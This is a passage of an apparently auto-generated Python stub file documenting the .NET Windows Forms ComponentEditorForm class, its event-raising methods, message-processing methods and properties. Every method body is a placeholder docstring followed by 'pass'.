OnInputLanguageChanging(self: Form, e: InputLanguageChangingEventArgs)
Raises the System.Windows.Forms.Form.InputLanguageChanging event.
e: The System.Windows.Forms.InputLanguageChangingEventArgs that contains the event data.
"""
pass
def OnInvalidated(self, *args): #cannot find CLR method
"""
OnInvalidated(self: Control, e: InvalidateEventArgs)
Raises the System.Windows.Forms.Control.Invalidated event.
e: An System.Windows.Forms.InvalidateEventArgs that contains the event data.
"""
pass
def OnKeyDown(self, *args): #cannot find CLR method
"""
OnKeyDown(self: Control, e: KeyEventArgs)
Raises the System.Windows.Forms.Control.KeyDown event.
e: A System.Windows.Forms.KeyEventArgs that contains the event data.
"""
pass
def OnKeyPress(self, *args): #cannot find CLR method
"""
OnKeyPress(self: Control, e: KeyPressEventArgs)
Raises the System.Windows.Forms.Control.KeyPress event.
e: A System.Windows.Forms.KeyPressEventArgs that contains the event data.
"""
pass
def OnKeyUp(self, *args): #cannot find CLR method
"""
OnKeyUp(self: Control, e: KeyEventArgs)
Raises the System.Windows.Forms.Control.KeyUp event.
e: A System.Windows.Forms.KeyEventArgs that contains the event data.
"""
pass
def OnLayout(self, *args): #cannot find CLR method
"""
OnLayout(self: Form, levent: LayoutEventArgs)
Raises the System.Windows.Forms.Control.Layout event.
levent: The event data.
"""
pass
def OnLeave(self, *args): #cannot find CLR method
"""
OnLeave(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Leave event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnLoad(self, *args): #cannot find CLR method
"""
OnLoad(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.Load event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnLocationChanged(self, *args): #cannot find CLR method
"""
OnLocationChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.LocationChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnLostFocus(self, *args): #cannot find CLR method
"""
OnLostFocus(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.LostFocus event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMarginChanged(self, *args): #cannot find CLR method
"""
OnMarginChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MarginChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnMaximizedBoundsChanged(self, *args): #cannot find CLR method
"""
OnMaximizedBoundsChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.MaximizedBoundsChanged event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnMaximumSizeChanged(self, *args): #cannot find CLR method
"""
OnMaximumSizeChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.MaximumSizeChanged event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnMdiChildActivate(self, *args): #cannot find CLR method
"""
OnMdiChildActivate(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.MdiChildActivate event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnMenuComplete(self, *args): #cannot find CLR method
"""
OnMenuComplete(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.MenuComplete event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnMenuStart(self, *args): #cannot find CLR method
"""
OnMenuStart(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.MenuStart event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnMinimumSizeChanged(self, *args): #cannot find CLR method
"""
OnMinimumSizeChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.MinimumSizeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseCaptureChanged(self, *args): #cannot find CLR method
"""
OnMouseCaptureChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseCaptureChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseClick(self, *args): #cannot find CLR method
"""
OnMouseClick(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseClick event.
e: An System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseDoubleClick(self, *args): #cannot find CLR method
"""
OnMouseDoubleClick(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseDoubleClick event.
e: An System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseDown(self, *args): #cannot find CLR method
"""
OnMouseDown(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseDown event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseEnter(self, *args): #cannot find CLR method
"""
OnMouseEnter(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseEnter event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseHover(self, *args): #cannot find CLR method
"""
OnMouseHover(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseHover event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseLeave(self, *args): #cannot find CLR method
"""
OnMouseLeave(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseLeave event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseMove(self, *args): #cannot find CLR method
"""
OnMouseMove(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseMove event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseUp(self, *args): #cannot find CLR method
"""
OnMouseUp(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseUp event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseWheel(self, *args): #cannot find CLR method
"""
OnMouseWheel(self: ScrollableControl, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseWheel event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMove(self, *args): #cannot find CLR method
"""
OnMove(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Move event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnNotifyMessage(self, *args): #cannot find CLR method
"""
OnNotifyMessage(self: Control, m: Message)
Notifies the control of Windows messages.
m: A System.Windows.Forms.Message that represents the Windows message.
"""
pass
def OnPaddingChanged(self, *args): #cannot find CLR method
"""
OnPaddingChanged(self: ScrollableControl, e: EventArgs)
Raises the System.Windows.Forms.Control.PaddingChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnPaint(self, *args): #cannot find CLR method
"""
OnPaint(self: Form, e: PaintEventArgs)
Raises the System.Windows.Forms.Control.Paint event.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnPaintBackground(self, *args): #cannot find CLR method
"""
OnPaintBackground(self: ScrollableControl, e: PaintEventArgs)
Paints the background of the control.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnParentBackColorChanged(self, *args): #cannot find CLR method
"""
OnParentBackColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackColorChanged event when the
System.Windows.Forms.Control.BackColor property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentBackgroundImageChanged(self, *args): #cannot find CLR method
"""
OnParentBackgroundImageChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackgroundImageChanged event when the
System.Windows.Forms.Control.BackgroundImage property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentBindingContextChanged(self, *args): #cannot find CLR method
"""
OnParentBindingContextChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BindingContextChanged event when the
System.Windows.Forms.Control.BindingContext property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentChanged(self, *args): #cannot find CLR method
"""
OnParentChanged(self: ContainerControl, e: EventArgs)
Raises the System.Windows.Forms.Control.ParentChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentCursorChanged(self, *args): #cannot find CLR method
"""
OnParentCursorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.CursorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentEnabledChanged(self, *args): #cannot find CLR method
"""
OnParentEnabledChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.EnabledChanged event when the
System.Windows.Forms.Control.Enabled property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentFontChanged(self, *args): #cannot find CLR method
"""
OnParentFontChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.FontChanged event when the
System.Windows.Forms.Control.Font property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentForeColorChanged(self, *args): #cannot find CLR method
"""
OnParentForeColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ForeColorChanged event when the
System.Windows.Forms.Control.ForeColor property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentRightToLeftChanged(self, *args): #cannot find CLR method
"""
OnParentRightToLeftChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.RightToLeftChanged event when the
System.Windows.Forms.Control.RightToLeft property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentVisibleChanged(self, *args): #cannot find CLR method
"""
OnParentVisibleChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.VisibleChanged event when the
System.Windows.Forms.Control.Visible property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnPreviewKeyDown(self, *args): #cannot find CLR method
"""
OnPreviewKeyDown(self: Control, e: PreviewKeyDownEventArgs)
Raises the System.Windows.Forms.Control.PreviewKeyDown event.
e: A System.Windows.Forms.PreviewKeyDownEventArgs that contains the event data.
"""
pass
def OnPrint(self, *args): #cannot find CLR method
"""
OnPrint(self: Control, e: PaintEventArgs)
Raises the System.Windows.Forms.Control.Paint event.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnQueryContinueDrag(self, *args): #cannot find CLR method
"""
OnQueryContinueDrag(self: Control, qcdevent: QueryContinueDragEventArgs)
Raises the System.Windows.Forms.Control.QueryContinueDrag event.
qcdevent: A System.Windows.Forms.QueryContinueDragEventArgs that contains the event data.
"""
pass
def OnRegionChanged(self, *args): #cannot find CLR method
"""
OnRegionChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.RegionChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnResize(self, *args): #cannot find CLR method
"""
OnResize(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.Resize event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnResizeBegin(self, *args): #cannot find CLR method
"""
OnResizeBegin(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.ResizeBegin event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnResizeEnd(self, *args): #cannot find CLR method
"""
OnResizeEnd(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.ResizeEnd event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnRightToLeftChanged(self, *args): #cannot find CLR method
"""
OnRightToLeftChanged(self: ScrollableControl, e: EventArgs)
Raises the System.Windows.Forms.Control.RightToLeftChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnRightToLeftLayoutChanged(self, *args): #cannot find CLR method
"""
OnRightToLeftLayoutChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.RightToLeftLayoutChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnScroll(self, *args): #cannot find CLR method
"""
OnScroll(self: ScrollableControl, se: ScrollEventArgs)
Raises the System.Windows.Forms.ScrollableControl.Scroll event.
se: A System.Windows.Forms.ScrollEventArgs that contains the event data.
"""
pass
def OnSelChangeSelector(self, *args): #cannot find CLR method
"""
OnSelChangeSelector(self: ComponentEditorForm, source: object, e: TreeViewEventArgs)
Switches between component editor pages.
source: The source of the event.
e: A System.Windows.Forms.TreeViewEventArgs that contains the event data.
"""
pass
def OnShown(self, *args): #cannot find CLR method
"""
OnShown(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.Shown event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnSizeChanged(self, *args): #cannot find CLR method
"""
OnSizeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.SizeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnStyleChanged(self, *args): #cannot find CLR method
"""
OnStyleChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.StyleChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnSystemColorsChanged(self, *args): #cannot find CLR method
"""
OnSystemColorsChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.SystemColorsChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnTabIndexChanged(self, *args): #cannot find CLR method
"""
OnTabIndexChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.TabIndexChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnTabStopChanged(self, *args): #cannot find CLR method
"""
OnTabStopChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.TabStopChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnTextChanged(self, *args): #cannot find CLR method
"""
OnTextChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.TextChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnValidated(self, *args): #cannot find CLR method
"""
OnValidated(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Validated event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnValidating(self, *args): #cannot find CLR method
"""
OnValidating(self: Control, e: CancelEventArgs)
Raises the System.Windows.Forms.Control.Validating event.
e: A System.ComponentModel.CancelEventArgs that contains the event data.
"""
pass
def OnVisibleChanged(self, *args): #cannot find CLR method
"""
OnVisibleChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.VisibleChanged event.
e: The System.EventArgs that contains the event data.
"""
pass
def PreProcessMessage(self, msg):
"""
PreProcessMessage(self: ComponentEditorForm, msg: Message) -> (bool, Message)
Provides a method to override in order to preprocess input messages before they are dispatched.
msg: A System.Windows.Forms.Message that specifies the message to preprocess.
Returns: true if the specified message is for a component editor page; otherwise, false.
"""
pass
def ProcessCmdKey(self, *args): #cannot find CLR method
"""
ProcessCmdKey(self: Form, msg: Message, keyData: Keys) -> (bool, Message)
Processes a command key.
msg: A System.Windows.Forms.Message, passed by reference, that represents the Win32 message to
process.
keyData: One of the System.Windows.Forms.Keys values that represents the key to process.
Returns: true if the keystroke was processed and consumed by the control; otherwise, false to allow
further processing.
"""
pass
def ProcessDialogChar(self, *args): #cannot find CLR method
"""
ProcessDialogChar(self: Form, charCode: Char) -> bool
Processes a dialog character.
charCode: The character to process.
Returns: true if the character was processed by the control; otherwise, false.
"""
pass
def ProcessDialogKey(self, *args): #cannot find CLR method
"""
ProcessDialogKey(self: Form, keyData: Keys) -> bool
Processes a dialog box key.
keyData: One of the System.Windows.Forms.Keys values that represents the key to process.
Returns: true if the keystroke was processed and consumed by the control; otherwise, false to allow
further processing.
"""
pass
def ProcessKeyEventArgs(self, *args): #cannot find CLR method
"""
ProcessKeyEventArgs(self: Control, m: Message) -> (bool, Message)
Processes a key message and generates the appropriate control events.
m: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
Returns: true if the message was processed by the control; otherwise, false.
"""
pass
def ProcessKeyMessage(self, *args): #cannot find CLR method
"""
ProcessKeyMessage(self: Control, m: Message) -> (bool, Message)
Processes a keyboard message.
m: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
Returns: true if the message was processed by the control; otherwise, false.
"""
pass
def ProcessKeyPreview(self, *args): #cannot find CLR method
"""
ProcessKeyPreview(self: Form, m: Message) -> (bool, Message)
Previews a keyboard message.
m: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
Returns: true if the message was processed by the control; otherwise, false.
"""
pass
def ProcessMnemonic(self, *args): #cannot find CLR method
"""
ProcessMnemonic(self: Form, charCode: Char) -> bool
Processes a mnemonic character.
charCode: The character to process.
Returns: true if the character was processed as a mnemonic by the control; otherwise, false.
"""
pass
def ProcessTabKey(self, *args): #cannot find CLR method
"""
ProcessTabKey(self: Form, forward: bool) -> bool
Selects the next available control and makes it the active control.
forward: true to cycle forward through the controls in the System.Windows.Forms.ContainerControl;
otherwise, false.
Returns: true if a control is selected; otherwise, false.
"""
pass
def RaiseDragEvent(self, *args): #cannot find CLR method
"""
RaiseDragEvent(self: Control, key: object, e: DragEventArgs)
Raises the appropriate drag event.
key: The event to raise.
e: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def RaiseKeyEvent(self, *args): #cannot find CLR method
"""
RaiseKeyEvent(self: Control, key: object, e: KeyEventArgs)
Raises the appropriate key event.
key: The event to raise.
e: A System.Windows.Forms.KeyEventArgs that contains the event data.
"""
pass
def RaiseMouseEvent(self, *args): #cannot find CLR method
"""
RaiseMouseEvent(self: Control, key: object, e: MouseEventArgs)
Raises the appropriate mouse event.
key: The event to raise.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def RaisePaintEvent(self, *args): #cannot find CLR method
"""
RaisePaintEvent(self: Control, key: object, e: PaintEventArgs)
Raises the appropriate paint event.
key: The event to raise.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def RecreateHandle(self, *args): #cannot find CLR method
"""
RecreateHandle(self: Control)
Forces the re-creation of the handle for the control.
"""
pass
def RescaleConstantsForDpi(self, *args): #cannot find CLR method
""" RescaleConstantsForDpi(self: Control, deviceDpiOld: int, deviceDpiNew: int) """
pass
def ResetMouseEventArgs(self, *args): #cannot find CLR method
"""
ResetMouseEventArgs(self: Control)
Resets the control to handle the System.Windows.Forms.Control.MouseLeave event.
"""
pass
def RtlTranslateAlignment(self, *args): #cannot find CLR method
"""
RtlTranslateAlignment(self: Control, align: ContentAlignment) -> ContentAlignment
Converts the specified System.Drawing.ContentAlignment to the appropriate
System.Drawing.ContentAlignment to support right-to-left text.
align: One of the System.Drawing.ContentAlignment values.
Returns: One of the System.Drawing.ContentAlignment values.
RtlTranslateAlignment(self: Control, align: LeftRightAlignment) -> LeftRightAlignment
Converts the specified System.Windows.Forms.LeftRightAlignment to the appropriate
System.Windows.Forms.LeftRightAlignment to support right-to-left text.
align: One of the System.Windows.Forms.LeftRightAlignment values.
Returns: One of the System.Windows.Forms.LeftRightAlignment values.
RtlTranslateAlignment(self: Control, align: HorizontalAlignment) -> HorizontalAlignment
Converts the specified System.Windows.Forms.HorizontalAlignment to the appropriate
System.Windows.Forms.HorizontalAlignment to support right-to-left text.
align: One of the System.Windows.Forms.HorizontalAlignment values.
Returns: One of the System.Windows.Forms.HorizontalAlignment values.
"""
pass
def RtlTranslateContent(self, *args): #cannot find CLR method
"""
RtlTranslateContent(self: Control, align: ContentAlignment) -> ContentAlignment
Converts the specified System.Drawing.ContentAlignment to the appropriate
System.Drawing.ContentAlignment to support right-to-left text.
align: One of the System.Drawing.ContentAlignment values.
Returns: One of the System.Drawing.ContentAlignment values.
"""
pass
def RtlTranslateHorizontal(self, *args): #cannot find CLR method
"""
RtlTranslateHorizontal(self: Control, align: HorizontalAlignment) -> HorizontalAlignment
Converts the specified System.Windows.Forms.HorizontalAlignment to the appropriate
System.Windows.Forms.HorizontalAlignment to support right-to-left text.
align: One of the System.Windows.Forms.HorizontalAlignment values.
Returns: One of the System.Windows.Forms.HorizontalAlignment values.
"""
pass
def RtlTranslateLeftRight(self, *args): #cannot find CLR method
"""
RtlTranslateLeftRight(self: Control, align: LeftRightAlignment) -> LeftRightAlignment
Converts the specified System.Windows.Forms.LeftRightAlignment to the appropriate
System.Windows.Forms.LeftRightAlignment to support right-to-left text.
align: One of the System.Windows.Forms.LeftRightAlignment values.
Returns: One of the System.Windows.Forms.LeftRightAlignment values.
"""
pass
def ScaleControl(self, *args): #cannot find CLR method
"""
ScaleControl(self: Form, factor: SizeF, specified: BoundsSpecified)
Scales the location, size, padding, and margin of a control.
factor: The factor by which the height and width of the control are scaled.
specified: A System.Windows.Forms.BoundsSpecified value that specifies the bounds of the control to use
when defining its size and position.
"""
pass
def ScaleCore(self, *args): #cannot find CLR method
"""
ScaleCore(self: Form, x: Single, y: Single)
Performs scaling of the form.
x: Percentage to scale the form horizontally.
y: Percentage to scale the form vertically.
"""
pass
def ScrollToControl(self, *args): #cannot find CLR method
"""
ScrollToControl(self: ScrollableControl, activeControl: Control) -> Point
Calculates the scroll offset to the specified child control.
activeControl: The child control to scroll into view.
Returns: The upper-left hand System.Drawing.Point of the display area relative to the client area
required to scroll the control into view.
"""
pass
def Select(self, *args):
"""
Select(self: Form, directed: bool, forward: bool)
Selects this form, and optionally selects the next or previous control.
directed: If set to true, the active control is changed.
forward: If directed is true, this controls the direction in which focus is moved: if true, the
next control is selected; otherwise, the previous control is selected.
"""
pass
def SetAutoSizeMode(self, *args): #cannot find CLR method
"""
SetAutoSizeMode(self: Control, mode: AutoSizeMode)
Sets a value indicating how a control will behave when its System.Windows.Forms.Control.AutoSize
property is enabled.
mode: One of the System.Windows.Forms.AutoSizeMode values.
"""
pass
def SetBoundsCore(self, *args): #cannot find CLR method
"""
SetBoundsCore(self: Form, x: int, y: int, width: int, height: int, specified: BoundsSpecified)
x: The x-coordinate.
y: The y-coordinate.
width: The bounds width.
height: The bounds height.
specified: A value from the BoundsSpecified enumeration.
"""
pass
def SetClientSizeCore(self, *args): #cannot find CLR method
"""
SetClientSizeCore(self: Form, x: int, y: int)
Sets the client size of the form. This will adjust the bounds of the form to make the client
size the requested size.
x: Requested width of the client region.
y: Requested height of the client region.
"""
pass
def SetDisplayRectLocation(self, *args): #cannot find CLR method
"""
SetDisplayRectLocation(self: ScrollableControl, x: int, y: int)
Positions the display window to the specified value.
x: The horizontal offset at which to position the System.Windows.Forms.ScrollableControl.
y: The vertical offset at which to position the System.Windows.Forms.ScrollableControl.
"""
pass
def SetScrollState(self, *args): #cannot find CLR method
"""
SetScrollState(self: ScrollableControl, bit: int, value: bool)
Sets the specified scroll state flag.
bit: The scroll state flag to set.
value: The value to set the flag.
"""
pass
def SetStyle(self, *args): #cannot find CLR method
"""
SetStyle(self: Control, flag: ControlStyles, value: bool)
Sets a specified System.Windows.Forms.ControlStyles flag to either true or false.
flag: The System.Windows.Forms.ControlStyles bit to set.
value: true to apply the specified style to the control; otherwise, false.
"""
pass
def SetTopLevel(self, *args): #cannot find CLR method
"""
SetTopLevel(self: Control, value: bool)
Sets the control as the top-level control.
value: true to set the control as the top-level control; otherwise, false.
"""
pass
def SetVisibleCore(self, *args): #cannot find CLR method
"""
SetVisibleCore(self: Form, value: bool)
value: true to make the control visible; otherwise, false.
"""
pass
def ShowForm(self, *__args):
"""
ShowForm(self: ComponentEditorForm, owner: IWin32Window) -> DialogResult
Shows the form with the specified owner.
owner: The System.Windows.Forms.IWin32Window to own the dialog.
Returns: One of the System.Windows.Forms.DialogResult values indicating the result code returned from the
dialog box.
ShowForm(self: ComponentEditorForm, owner: IWin32Window, page: int) -> DialogResult
Shows the form and the specified page with the specified owner.
owner: The System.Windows.Forms.IWin32Window to own the dialog.
page: The index of the page to show.
Returns: One of the System.Windows.Forms.DialogResult values indicating the result code returned from the
dialog box.
ShowForm(self: ComponentEditorForm) -> DialogResult
Shows the form. The form will have no owner window.
Returns: One of the System.Windows.Forms.DialogResult values indicating the result code returned from the
dialog box.
ShowForm(self: ComponentEditorForm, page: int) -> DialogResult
Shows the specified page of the form. The form will have no owner window.
page: The index of the page to show.
Returns: One of the System.Windows.Forms.DialogResult values indicating the result code returned from the
dialog box.
"""
pass
def SizeFromClientSize(self, *args): #cannot find CLR method
"""
SizeFromClientSize(self: Control, clientSize: Size) -> Size
Determines the size of the entire control from the height and width of its client area.
clientSize: A System.Drawing.Size value representing the height and width of the control's client area.
Returns: A System.Drawing.Size value representing the height and width of the entire control.
"""
pass
def UpdateBounds(self, *args): #cannot find CLR method
"""
UpdateBounds(self: Control, x: int, y: int, width: int, height: int, clientWidth: int, clientHeight: int)
Updates the bounds of the control with the specified size, location, and client size.
x: The System.Drawing.Point.X coordinate of the control.
y: The System.Drawing.Point.Y coordinate of the control.
width: The System.Drawing.Size.Width of the control.
height: The System.Drawing.Size.Height of the control.
clientWidth: The client System.Drawing.Size.Width of the control.
clientHeight: The client System.Drawing.Size.Height of the control.
UpdateBounds(self: Control, x: int, y: int, width: int, height: int)
Updates the bounds of the control with the specified size and location.
x: The System.Drawing.Point.X coordinate of the control.
y: The System.Drawing.Point.Y coordinate of the control.
width: The System.Drawing.Size.Width of the control.
height: The System.Drawing.Size.Height of the control.
UpdateBounds(self: Control)
Updates the bounds of the control with the current size and location.
"""
pass
def UpdateDefaultButton(self, *args): #cannot find CLR method
"""
UpdateDefaultButton(self: Form)
Updates which button is the default button.
"""
pass
def UpdateStyles(self, *args): #cannot find CLR method
"""
UpdateStyles(self: Control)
Forces the assigned styles to be reapplied to the control.
"""
pass
def UpdateZOrder(self, *args): #cannot find CLR method
"""
UpdateZOrder(self: Control)
Updates the control in its parent's z-order.
"""
pass
def WndProc(self, *args): #cannot find CLR method
"""
WndProc(self: Form, m: Message) -> Message
m: The Windows System.Windows.Forms.Message to process.
"""
pass
def __enter__(self, *args): #cannot find CLR method
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self, *args): #cannot find CLR method
"""
__exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(cls, component, pageTypes):
""" __new__(cls: type, component: object, pageTypes: Array[Type]) """
pass
def __str__(self, *args): #cannot find CLR method
pass
AutoScaleFactor = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the scaling factor between the current and design-time automatic scaling dimensions.
"""
AutoSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Get: AutoSize(self: ComponentEditorForm) -> bool
Set: AutoSize(self: ComponentEditorForm) = value
"""
CanEnableIme = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the System.Windows.Forms.Control.ImeMode property can be set to an active value, to enable IME support.
"""
CanRaiseEvents = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Determines if events can be raised on the control.
"""
CreateParams = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
DefaultCursor = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the default cursor for the control.
"""
DefaultImeMode = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the default Input Method Editor (IME) mode supported by the control.
"""
DefaultMargin = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the space, in pixels, that is specified by default between controls.
"""
DefaultMaximumSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the length and height, in pixels, that is specified as the default maximum size of a control.
"""
DefaultMinimumSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the length and height, in pixels, that is specified as the default minimum size of a control.
"""
DefaultPadding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the internal spacing, in pixels, of the contents of a control.
"""
DefaultSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
DesignMode = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value that indicates whether the System.ComponentModel.Component is currently in design mode.
"""
DoubleBuffered = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether this control should redraw its surface using a secondary buffer to reduce or prevent flicker.
"""
Events = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the list of event handlers that are attached to this System.ComponentModel.Component.
"""
FontHeight = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the height of the font of the control.
"""
HScroll = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the horizontal scroll bar is visible.
"""
ImeModeBase = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the IME mode of a control.
"""
MaximizedBounds = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets and sets the size of the form when it is maximized.
"""
RenderRightToLeft = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""This property is now obsolete.
"""
ResizeRedraw = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the control redraws itself when resized.
"""
ScaleChildren = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value that determines the scaling of child controls.
"""
ShowFocusCues = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the control should display focus rectangles.
"""
ShowKeyboardCues = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the user interface is in the appropriate state to show or hide keyboard accelerators.
"""
ShowWithoutActivation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the window will be activated when it is shown.
"""
VScroll = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the vertical scroll bar is visible.
"""
AutoSizeChanged = None
class ComponentEditorPage(Panel, IComponent, IDisposable, IOleControl, IOleObject, IOleInPlaceObject, IOleInPlaceActiveObject, IOleWindow, IViewObject, IViewObject2, IPersist, IPersistStreamInit, IPersistPropertyBag, IPersistStorage, IQuickActivate, ISupportOleDropSource, IDropTarget, ISynchronizeInvoke, IWin32Window, IArrangedElement, IBindableComponent):
"""
Provides a base implementation for a System.Windows.Forms.Design.ComponentEditorPage.
